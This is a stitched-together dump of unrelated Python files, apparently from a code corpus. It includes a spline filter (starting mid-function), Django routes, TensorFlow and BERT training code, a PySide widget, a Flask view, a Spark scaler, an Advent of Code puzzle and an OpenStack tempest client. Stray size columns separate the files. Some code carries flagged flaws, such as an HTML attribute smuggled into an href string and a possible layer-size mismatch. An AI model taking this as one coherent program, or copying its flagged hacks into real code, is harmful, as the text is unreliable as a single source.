    # Axis-1 pass over the padded axis-0 extent.
    for i in range(n0):
        for k in range(m2):
            for l in range(m3):
                find_coefs_1d(dinv[1], m1, coefs[i, :, k, l], coefs[i, :, k, l])
    # Axis-2 pass over the padded axis-0/1 extents.
    for i in range(n0):
        for j in range(n1):
            for l in range(m3):
                find_coefs_1d(dinv[2], m2, coefs[i, j, :, l], coefs[i, j, :, l])
    # Axis-3 pass over the padded axis-0/1/2 extents.
    for i in range(n0):
        for j in range(n1):
            for k in range(n2):
                find_coefs_1d(dinv[3], m3, coefs[i, j, k, :], coefs[i, j, k, :])
    return coefs
def filter_coeffs(smin, smax, orders, data):
    """Fit spline coefficients for flat data on a regular grid.

    ``smin``/``smax`` are the grid bounds per dimension, ``orders`` the
    number of points per dimension; ``data`` is reshaped accordingly.
    """
    lo = np.array(smin, dtype=float)
    hi = np.array(smax, dtype=float)
    inv_steps = (hi - lo) / orders
    return filter_data(inv_steps, data.reshape(orders))
def filter_mcoeffs(smin, smax, orders, data):
    """Fit coefficients for several stacked splines.

    The last axis of ``data`` indexes the splines; each is filtered
    independently with :func:`filter_coeffs`.

    Returns:
        Array of shape ``tuple(o + 2 for o in orders) + (n_splines,)``.
    """
    # (Removed an unused ``order = len(smin)`` local from the original.)
    n_splines = data.shape[-1]
    coefs = np.zeros(tuple(i + 2 for i in orders) + (n_splines,))
    for i in range(n_splines):
        coefs[..., i] = filter_coeffs(smin, smax, orders, data[..., i])
    return coefs
def filter_data(dinv, data):
    """Dispatch to the dimension-specific coefficient filter.

    Args:
        dinv: per-dimension inverse grid spacings; its length selects
            the 1-D to 4-D implementation.
        data: gridded data with ``len(dinv)`` dimensions.

    Raises:
        ValueError: if more than 4 dimensions are requested (the
            original silently returned ``None`` in that case).
    """
    dim = len(dinv)
    if dim == 1:
        return filter_coeffs_1d(dinv, data)
    elif dim == 2:
        return filter_coeffs_2d(dinv, data)
    elif dim == 3:
        return filter_coeffs_3d(dinv, data)
    elif dim == 4:
        return filter_coeffs_4d(dinv, data)
    raise ValueError("filter_data supports 1 to 4 dimensions, got {}".format(dim))
#
if __name__ == "__main__":
    # Quick smoke test / benchmark: filter a small and a large 3-D grid
    # and report wall-clock time for each (the first call also pays the
    # JIT compilation cost).
    import numpy
    import time
    dinv = numpy.ones(3, dtype=float) * 0.5
    small_grid = numpy.random.random([10, 10, 10])
    big_grid = numpy.random.random([100, 100, 100])
    print(small_grid[:2, :2, :2])
    for grid in (small_grid, big_grid):
        start = time.time()
        filter_coeffs_3d(dinv, grid)
        print('Elapsed : {}'.format(time.time() - start))
| 6,211 | 2,899 |
from django.urls import path
from . import views
# URL routes for the product API (function-based views in views.py).
urlpatterns = [
    path('product/', views.apiOverview, name='overview'),
    path('product/list/', views.productList, name='product-list'),
    path('product/detail/<str:pk>', views.productDetail, name='product-detail'),
    # NOTE(review): 'create' has no trailing slash while 'list/' does --
    # confirm the inconsistency is intentional (it interacts with
    # Django's APPEND_SLASH redirect behaviour).
    path('product/create', views.productCreate, name='product-create'),
    path('product/update/<str:pk>', views.productUpdate, name='product-update'),
    path('product/delete/<str:pk>', views.productDelete, name='product-delete'),
]
from tensorflow.keras.callbacks import ModelCheckpoint, LearningRateScheduler, TensorBoard
import tensorflow as tf
import Data
import Model
# import myslack
import os
import argparse
from tensorflow.python.client import device_lib
import warnings
warnings.filterwarnings("ignore")
# CLI: choose which GPUs are visible to TensorFlow via CUDA_VISIBLE_DEVICES.
# NOTE(review): the description says 'PyTorch Training' but this script
# uses TensorFlow/Keras -- likely copy-pasted; confirm and fix the text.
parser = argparse.ArgumentParser(description='PyTorch Training')
parser.add_argument('--gpus', default='3', type=str, help='Which GPUs you want to use? (0,1,2,3)')
args = parser.parse_args()
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpus
# myslack.send_slack("start")
# path = 'D:/Models/'
# Checkpoint output directory used by ModelCheckpoint below.
path = 'Models/gpu2/'
# path = 'Models/'
# NOTE(review): commented-out snippet passes 'GPUS' where the device type
# is normally 'GPU' -- fix if this is ever re-enabled.
#gpus = tf.config.experimental.list_logical_devices('GPUS')
#if gpus:
#    tf.config.experimental.set_memory_growth(gpus[0], True)
def scheduler(epoch):
    """Keras learning-rate schedule: warm-up, bridge epoch, plateau, decay.

    Epochs 0-2 use the warm-up rate, epoch 3 the midpoint between the
    warm-up and main rates, epochs 4-14 the main rate, and epoch 15
    onwards the reduced rate.
    """
    warmup = 3
    warmup_lr = 1e-5  # 0.00001
    threshold = 15
    lr = 1e-4  # 0.0001
    lr2 = 5e-5  # 0.00005
    if epoch > warmup:
        return lr if epoch < threshold else lr2
    if epoch == warmup:
        return (lr + warmup_lr) / 2
    return warmup_lr
# Save a checkpoint each epoch (filename tagged with IoU metrics) and
# drive the learning rate with the scheduler above.
callback = [
    ModelCheckpoint(path + 'model_{epoch:02d}-{val_iou_acc:.4f}_{iou_acc:.4f}.h5'),
    LearningRateScheduler(scheduler, verbose=1),
    # TensorBoard('./logs/', profile_batch=2)
]
#with tf.device('/XLA_GPU:0'):
b = 4  # batch size for both train and test loaders
tr_batch = Data.Load_tr(batch_size=b)
te_batch = Data.Load_te(batch_size=b)
print(tr_batch)
c = 3  # NOTE(review): unused -- SegModel is called with a literal 3 below
model = Model.SegModel(3)
model.load()
model.fit(tr_batch, te_batch, callback)
# myslack.send_slack("finish")
from PySide6.QtCore import *
from PySide6.QtGui import *
from PySide6.QtWidgets import *
class CustomPb(QWidget):
    """Horizontal progress bar with an optional background track and text.

    The bar is drawn near the bottom of the widget; the percentage label
    (value + suffix) is centred in the middle.
    """
    def __init__(
        self,
        value = 0,
        progress_width = 2,
        # progress_length= 500,
        is_rounded = False,
        max_value = 100,
        progress_color = "#ff79c6",
        enable_text = True,
        font_family = "Segoe UI",
        font_size = 12,
        suffix = "%",
        text_color = "#ff79c6",
        enable_bg = True,
        bg_color = "#44475a"
    ):
        QWidget.__init__(self)
        # CUSTOM PROPERTIES
        self.value = value                      # current progress value
        self.progress_width = progress_width    # bar thickness in px
        # self.progress_length = progress_length
        self.progress_rounded_cap = is_rounded  # round vs mitre joins
        self.max_value = max_value
        self.progress_color = progress_color
        # Text
        self.enable_text = enable_text
        self.font_family = font_family
        self.font_size = font_size
        self.suffix = suffix
        self.text_color = text_color
        # BG
        self.enable_bg = enable_bg
        self.bg_color = bg_color
    # ADD DROPSHADOW
    def add_shadow(self, enable):
        """Attach a drop-shadow graphics effect when *enable* is truthy."""
        if enable:
            self.shadow = QGraphicsDropShadowEffect(self)
            self.shadow.setBlurRadius(15)
            self.shadow.setXOffset(0)
            self.shadow.setYOffset(0)
            self.shadow.setColor(QColor(0, 0, 0, 80))
            self.setGraphicsEffect(self.shadow)
    # SET VALUE
    def setValue(self, value):
        """Update the progress value and repaint immediately."""
        self.value = value
        self.repaint()  # Render progress bar after change value
    # PAINT EVENT (DESIGN YOUR CIRCULAR PROGRESS HERE)
    def paintEvent(self, e):
        """Draw the background track, the progress bar and the text label.

        Fix vs. original: all coordinates handed to QRect/drawRect are
        coerced to int -- the original passed Python floats (from `/`),
        which the int-only Qt overloads reject with a TypeError.
        """
        # SET PROGRESS PARAMETERS
        width = self.width() - self.progress_width
        margin = int(self.progress_width / 2)
        # Bar baseline sits at 3/4 of the widget height.
        y = int(0.75 * self.height() + self.progress_width / 2)
        value = int((self.value / self.max_value) * width)
        # PAINTER
        paint = QPainter()
        paint.begin(self)
        paint.setRenderHint(QPainter.Antialiasing)  # remove pixelated edges
        paint.setFont(QFont(self.font_family, self.font_size))
        # CREATE RECTANGLE for the text value (centred, half the widget size)
        rect = QRect(self.width() // 4, self.height() // 4,
                     self.width() // 2, self.height() // 2)
        paint.setPen(Qt.NoPen)
        # PEN
        pen = QPen()
        pen.setWidth(self.progress_width)
        # Set Round Cap
        if self.progress_rounded_cap:
            pen.setJoinStyle(Qt.RoundJoin)
        else:
            pen.setJoinStyle(Qt.MiterJoin)
        # ENABLE BG: full-width track behind the progress bar
        if self.enable_bg:
            pen.setColor(QColor(self.bg_color))
            paint.setPen(pen)
            paint.drawRect(margin, y, width, self.progress_width)
        # Progress bar proper (partial width proportional to value)
        pen.setColor(QColor(self.progress_color))
        paint.setPen(pen)
        paint.drawRect(margin, y, value, self.progress_width)
        # CREATE TEXT
        if self.enable_text:
            pen.setColor(QColor(self.text_color))
            pen.setWidth(40)
            font = QFont()
            font.setPointSize(12)
            paint.setFont(font)
            paint.setPen(pen)
            paint.drawText(rect, Qt.AlignCenter, f"{self.value}{self.suffix}")
        # END
        paint.end()
"""Cam Hudson Personal Website app's index.html view.
URLs handled in this file include:
/
"""
from flask import render_template, session
from camhudson.views.utility import create_index_card # Make linter shut up
import camhudson
@camhudson.app.route('/', methods=['GET'])
@camhudson.app.route('/index.html', methods=['GET'])
def get_index() -> str:
    """Handle request for homepage.

    Builds the three landing-page cards (Bio, Résumé, Contact) and
    renders them through index.html.
    """
    context = {
        'cards': [
            create_index_card(
                'Bio',
                'Take a few moments to learn a little about Cam!',
                '/bio',
                '/static/images/cam.png',
                'Cam Hudson selfie'
            ),
            create_index_card(
                'Résumé',
                'Dive into Cam\'s skills, education, and work history!',
                # NOTE(review): this smuggles target="_blank" into the href
                # by closing the attribute's quote -- a fragile HTML
                # injection hack; consider a proper target parameter on
                # create_index_card instead.
                '/hudson-resume.pdf\" target=\"_blank',
                '/static/images/joao-ferrao-resume.png',
                'Resume on desk'
            ),
            create_index_card(
                'Contact',
                'Find out how you can get in touch with Cam!',
                'contact-info',
                '/static/images/elizaveta-kushnirenko-mailbox.png',
                'Mailbox',
            )
        ]
    }
    return render_template('index.html', **context)
| 1,301 | 371 |
from pyspark.sql import SparkSession
from pyspark.sql import functions as F
import argparse
from pyspark.ml.feature import MinMaxScaler, StandardScaler, VectorAssembler
def extract(row):
    """Flatten a Row into (id, *scaled features), dropping the last feature.

    The dropped trailing element is the synthetic 'id' column that was
    appended to the assembled feature vector.
    """
    values = row.scaledFeatures.toArray().tolist()
    return tuple([row.id] + values[:-1])
def normalize_data(df, scaler_type, columns):
    """
    Scale numeric features using two methods
    1) minmax normalization or
    2) standardization
    Args:
        df: input dataframe
        scaler_type: either "minmax" or "standard"
        columns: columns to be scaled/ normalized (falsy -> all columns
            except "id" and "timestamp")
    Return:
        Scaled dataframe (unscaled columns passed through unchanged)
    Raises:
        ValueError: if scaler_type is neither "minmax" nor "standard"
    """
    columns = (
        [col for col in df.columns if col not in {"id", "timestamp"}]
        if not columns
        else columns
    )
    # NOTE(review): set difference makes this column order
    # non-deterministic -- confirm downstream consumers are order-insensitive.
    not_normalized_columns = list(set(df.columns).difference(set(columns)))
    # Synthetic row id used to re-join scaled and unscaled halves at the end.
    df = df.withColumn("id", F.monotonically_increasing_id())
    # NOTE(review): += mutates the caller's list in place when a list was
    # passed -- consider `columns = columns + ["id"]`.
    columns += ["id"]
    not_normalized_columns += ["id"]
    # Assemble the selected columns (id included) into one vector column.
    assembler = VectorAssembler().setInputCols(
        columns).setOutputCol("features")
    transformed = assembler.transform(df.select(columns))
    if scaler_type == "minmax":
        scaler = MinMaxScaler(inputCol="features", outputCol="scaledFeatures")
    elif scaler_type == "standard":
        scaler = StandardScaler(
            inputCol="features",
            outputCol="scaledFeatures")
    else:
        raise ValueError("Invalid scaler type")
    scalerModel = scaler.fit(transformed.select("features"))
    scaledData = scalerModel.transform(transformed)
    # Unpack the scaled vector back into per-feature columns; `extract`
    # drops the trailing (scaled) id element.
    scaledData = (
        scaledData.select(["id", "scaledFeatures"])
        .rdd.map(extract)
        .toDF(["id"] + columns[:-1])
    )
    # Re-attach untouched columns by the synthetic id, then drop it.
    return df.select(not_normalized_columns).join(
        scaledData,
        on="id").drop("id")
if __name__ == "__main__":
    # CLI: read a CSV, scale the requested columns, write the result.
    parser = argparse.ArgumentParser()
    parser.add_argument("--input", required=True)
    parser.add_argument("--output", required=True)
    parser.add_argument("--norm", required=True)
    parser.add_argument("--columns", nargs="+", required=True)
    parser.add_argument("--coalesce", required=False, action="store_true")
    args = parser.parse_args()
    # Accept either a single space-separated string or multiple args.
    columns = args.columns[0].split(
        " ") if len(args.columns) == 1 else args.columns
    spark = SparkSession.builder.appName("DataFlow").getOrCreate()
    input_data = spark.read.csv(
        args.input,
        sep=",",
        inferSchema=True,
        header=True)
    input_data_scaled = normalize_data(input_data, args.norm, columns)
    # --coalesce writes a single output part file instead of many.
    if args.coalesce:
        input_data_scaled.coalesce(1).write.csv(args.output, header=True)
    else:
        input_data_scaled.write.csv(args.output, header=True)
| 2,661 | 827 |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2019 Judit Acs <judit@sch.bme.hu>
#
# Distributed under terms of the MIT license.
import torch
import torch.nn as nn
from pytorch_pretrained_bert import BertModel
from deep_morphology.models.base import BaseModel
from deep_morphology.models.seq2seq import compute_sequence_loss
from deep_morphology.models.mlp import MLP
# Decide once at import time whether a CUDA device is available.
use_cuda = torch.cuda.is_available()
def to_cuda(var):
    """Move *var* to the GPU when CUDA is available, else return it unchanged."""
    return var.cuda() if use_cuda else var
class BERTTagger(BaseModel):
    """POS tagger: frozen BERT features + optional BiLSTM + MLP head.

    Cleanup vs. original: the ``bert_weights`` Parameter was assigned
    twice and a ``nn.Linear`` output projection was created only to be
    immediately overwritten by the MLP -- both dead assignments removed
    (the surviving module registrations are identical).
    """
    def __init__(self, config, dataset):
        super().__init__(config)
        self.dataset = dataset
        self.output_size = len(dataset.vocabs.pos)
        model_name = getattr(self.config, 'bert_model', 'bert-base-multilingual-cased')
        self.bert = BertModel.from_pretrained(model_name)
        self.bert_layer = self.config.bert_layer
        # 'base' models: 768-dim hidden states, 12 layers; 'large': 1024/24.
        bert_size = 768 if 'base' in model_name else 1024
        n_layer = 12 if 'base' in model_name else 24
        if self.bert_layer == 'weighted_sum':
            # One learned scalar weight per BERT layer.
            self.bert_weights = nn.Parameter(torch.ones(n_layer, dtype=torch.float))
        if hasattr(self.config, 'lstm_size'):
            self.lstm = nn.LSTM(
                bert_size, self.config.lstm_size, batch_first=True,
                dropout=self.config.dropout,
                num_layers=self.config.lstm_num_layers,
                bidirectional=True)
            hidden_size = self.config.lstm_size * 2
        else:
            self.lstm = None
            hidden_size = bert_size
        # NOTE(review): the MLP takes bert_size inputs, but when the LSTM is
        # enabled its output width is hidden_size -- shapes only match if
        # lstm_size * 2 == bert_size. Confirm configs satisfy this.
        self.output_proj = MLP(
            input_size=bert_size,
            layers=self.config.mlp_layers,
            nonlinearity=self.config.mlp_nonlinearity,
            output_size=self.output_size,
        )
        # ignore <pad> = 3
        self.criterion = nn.CrossEntropyLoss(
            ignore_index=self.dataset.vocabs.pos['<pad>'])
        # BERT is used as a frozen feature extractor.
        for param in self.bert.parameters():
            param.requires_grad = False
    def compute_loss(self, batch, output):
        """Cross-entropy sequence loss against the gold POS tags."""
        target = to_cuda(torch.LongTensor(batch.pos))
        return compute_sequence_loss(target, output, self.criterion)
    def forward(self, batch):
        """Return per-token tag logits for a padded batch of sentences."""
        X = to_cuda(torch.LongTensor(batch.sentence))
        # Attention mask: 1 for real tokens, 0 for padding.
        mask = torch.arange(X.size(1)) < torch.LongTensor(batch.sentence_len).unsqueeze(1)
        mask = to_cuda(mask.long())
        bert_out, _ = self.bert(X, attention_mask=mask)
        # Combine the per-layer hidden states as configured: mean over
        # layers, learned weighted sum, or a single layer index.
        if self.bert_layer == 'mean':
            bert_out = torch.stack(bert_out).mean(0)
        elif self.bert_layer == 'weighted_sum':
            bert_out = (
                self.bert_weights[:, None, None, None] * torch.stack(bert_out)).sum(0)
        else:
            bert_out = bert_out[self.bert_layer]
        if self.lstm:
            bert_out = self.lstm(bert_out)[0]
        return self.output_proj(bert_out)
| 3,051 | 1,051 |
class Auto:
    """Minimal car record; all attributes are class-level defaults."""
    marca = ""   # brand name
    modelo = 0   # model number/year
    placa = ""   # license plate
# Instantiate and show the default model value (0).
taxi = Auto()
print(taxi.modelo)
# only the model attribute is printed
#! /usr/bin/env python3
part = 1
def read_input():
    """Read the puzzle input file and return its lines, whitespace-stripped."""
    with open('../inputs/input11.txt') as fp:
        return [line.strip() for line in fp]
class Seat:
    """One cell of the (padded) seating grid.

    States: 'L' empty seat, '#' occupied seat, '.' floor, and
    '_' / '|' for the padding border added by pad_grid. Neighbour
    lookups read the module-level ``seating`` grid.
    """
    def __init__(self, x, y, state):
        self.x = x
        self.y = y
        self.state = state
    def __str__(self):
        return self.state
    def isEdge(self):
        # True for the '_' / '|' padding cells around the grid.
        return self.state in '_|'
    def isFloor(self):
        return self.state == '.'
    def isEmptySeat(self):
        return self.state == 'L'
    def isFilledSeat(self):
        return self.state == '#'
    # @returns Seat[]
    def neighbours(self):
        """Return the eight adjacent cells (part-1 adjacency)."""
        global seating
        neighbs = {
            'W': seating[self.y][self.x - 1],
            'E': seating[self.y][self.x + 1],
            'S': seating[self.y + 1][self.x],
            'N': seating[self.y - 1][self.x],
            'NW': seating[self.y - 1][self.x - 1],
            'SW': seating[self.y + 1][self.x - 1],
            'NE': seating[self.y - 1][self.x + 1],
            'SE': seating[self.y + 1][self.x + 1]
        }
        return list(neighbs.values())
    # @returns Seat[]
    def line_of_sight_seats(self):
        """Return the first non-floor cell visible in each of 8 directions
        (part-2 adjacency); the padding border guarantees termination."""
        dirs = {
            'N': (-1,0),
            'NE': (-1,1),
            'E': (0,1),
            'SE': (1,1),
            'S': (1,0),
            'SW': (1,-1),
            'W': (0,-1),
            'NW': (-1,-1)
        }
        # look for first filled, empty or edge seat in a direction
        def look_at_seat(direction):
            pos = (self.y, self.x)
            # walk until something other than floor is hit (a seat or
            # the padding border, which always stops the walk)
            while 1:
                pos = (pos[0] + direction[0], pos[1] + direction[1])
                seat = seating[pos[0]][pos[1]]
                if not seat.isFloor():
                    return seat
        return [look_at_seat(direction) for direction in list(dirs.values())]
    def get_new_state(self):
        """Apply the occupancy rules and return this cell's next state."""
        # skip floors and edges
        if self.isEdge() or self.isFloor():
            return self.state
        # Part 1: direct neighbours, tolerance 4; part 2: line of
        # sight, tolerance 5 (module-level `part` selects the rules).
        if part == 1:
            tolerance = 4
            filled_neighbours = [nb for nb in self.neighbours() if nb.isFilledSeat()]
        else:
            tolerance = 5
            filled_neighbours = [nb for nb in self.line_of_sight_seats() if nb.isFilledSeat()]
        # node empty and no filled neighbs -> filled
        if self.isEmptySeat() and len(filled_neighbours) == 0:
            return '#'
        # node filled and 4+ filled neighbs -> empty
        elif self.isFilledSeat() and len(filled_neighbours) >= tolerance:
            return 'L'
        return self.state
# generate string snapshot of current seating area, for state comparison
# @returns {String}
def hash_seating(seating):
    return "".join(str(seat) for row in seating for seat in row)
# pad grid with | and _ to avoid out-of-bounds errors:
# @param {string[]} grid
def pad_grid(grid):
    """Wrap each row in '|' and add '_' border rows above and below."""
    padded = ["|" + row + "|" for row in grid]
    border = "_" * len(padded[0])
    return [border] + padded + [border]
# Build the padded grid and run the cellular automaton until it stabilises.
diagram = pad_grid(read_input())
# set up two 2D arrays, for current and next state
seating = []
next_seating = []
# fill initial seating
for y, line in enumerate(diagram):
    seating += [[]]
    for x, char in enumerate(line):
        seating[y] += [Seat(x, y, char)]
# one iteration of time
def run_step(i):
    """Compute the next grid from the current one (reads/writes the
    module-level seating / next_seating; parameter i is unused)."""
    global seating, next_seating
    # new empty seating before filling from current
    next_seating = []
    # fill next_seating
    for y, row in enumerate(seating):
        next_seating += [[]]
        for x, seat in enumerate(row):
            next_seating[y] += [Seat(seat.x, seat.y, seat.get_new_state())]
# run time and keep comparing hashes to detect stable state
i = 0
while 1:
    i += 1
    run_step(i)
    # progress...
    if i % 20 == 0:
        print(i, hash_seating(next_seating))
    if hash_seating(seating) == hash_seating(next_seating):
        # part 1 - number of full seats, once stable - 2183
        # part 2 - same - 1990
        print(hash_seating(seating).count("#"), "full seats")
        break
    else:
        # shift seating states before next loop
        seating, next_seating = next_seating, []
| 4,246 | 1,464 |
# coding=utf-8
u"""F5 Networks® LBaaSv2 L7 rules client for tempest tests."""
# Copyright 2016 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo_serialization import jsonutils
from six.moves.urllib import parse
from tempest.lib.common import rest_client
class L7PolicyClientJSON(rest_client.RestClient):
    """REST client for the LBaaSv2 L7 policy endpoints."""
    def list_l7policies(self, params=None):
        """Return the collection of L7 policies, optionally filtered."""
        url = 'v2.0/lbaas/l7policies.json'
        if params:
            url = '?'.join([url, parse.urlencode(params)])
        resp, raw = self.get(url)
        parsed = jsonutils.loads(raw)
        self.expected_success(200, resp.status)
        return rest_client.ResponseBodyList(resp, parsed['l7policies'])
    def get_l7policy(self, policy_id, params=None):
        """Return a single L7 policy by id."""
        url = 'v2.0/lbaas/l7policies/{}'.format(policy_id)
        if params:
            url = '?'.join([url, parse.urlencode(params)])
        resp, raw = self.get(url)
        parsed = jsonutils.loads(raw)
        self.expected_success(200, resp.status)
        return rest_client.ResponseBody(resp, parsed["l7policy"])
    def create_l7policy(self, **kwargs):
        """Create an L7 policy from the given attributes."""
        payload = jsonutils.dumps({"l7policy": kwargs})
        resp, raw = self.post('v2.0/lbaas/l7policies.json', payload)
        parsed = jsonutils.loads(raw)
        self.expected_success(201, resp.status)
        return rest_client.ResponseBody(resp, parsed["l7policy"])
    def update_l7policy(self, policy_id, **kwargs):
        """Update the given attributes on an existing L7 policy."""
        payload = jsonutils.dumps({"l7policy": kwargs})
        resp, raw = self.put('v2.0/lbaas/l7policies/{}'.format(policy_id), payload)
        parsed = jsonutils.loads(raw)
        self.expected_success(200, resp.status)
        return rest_client.ResponseBody(resp, parsed["l7policy"])
    def delete_l7policy(self, policy_id):
        """Delete an L7 policy by id."""
        resp, _ = self.delete('v2.0/lbaas/l7policies/{}'.format(policy_id))
        self.expected_success(204, resp.status)
| 2,667 | 899 |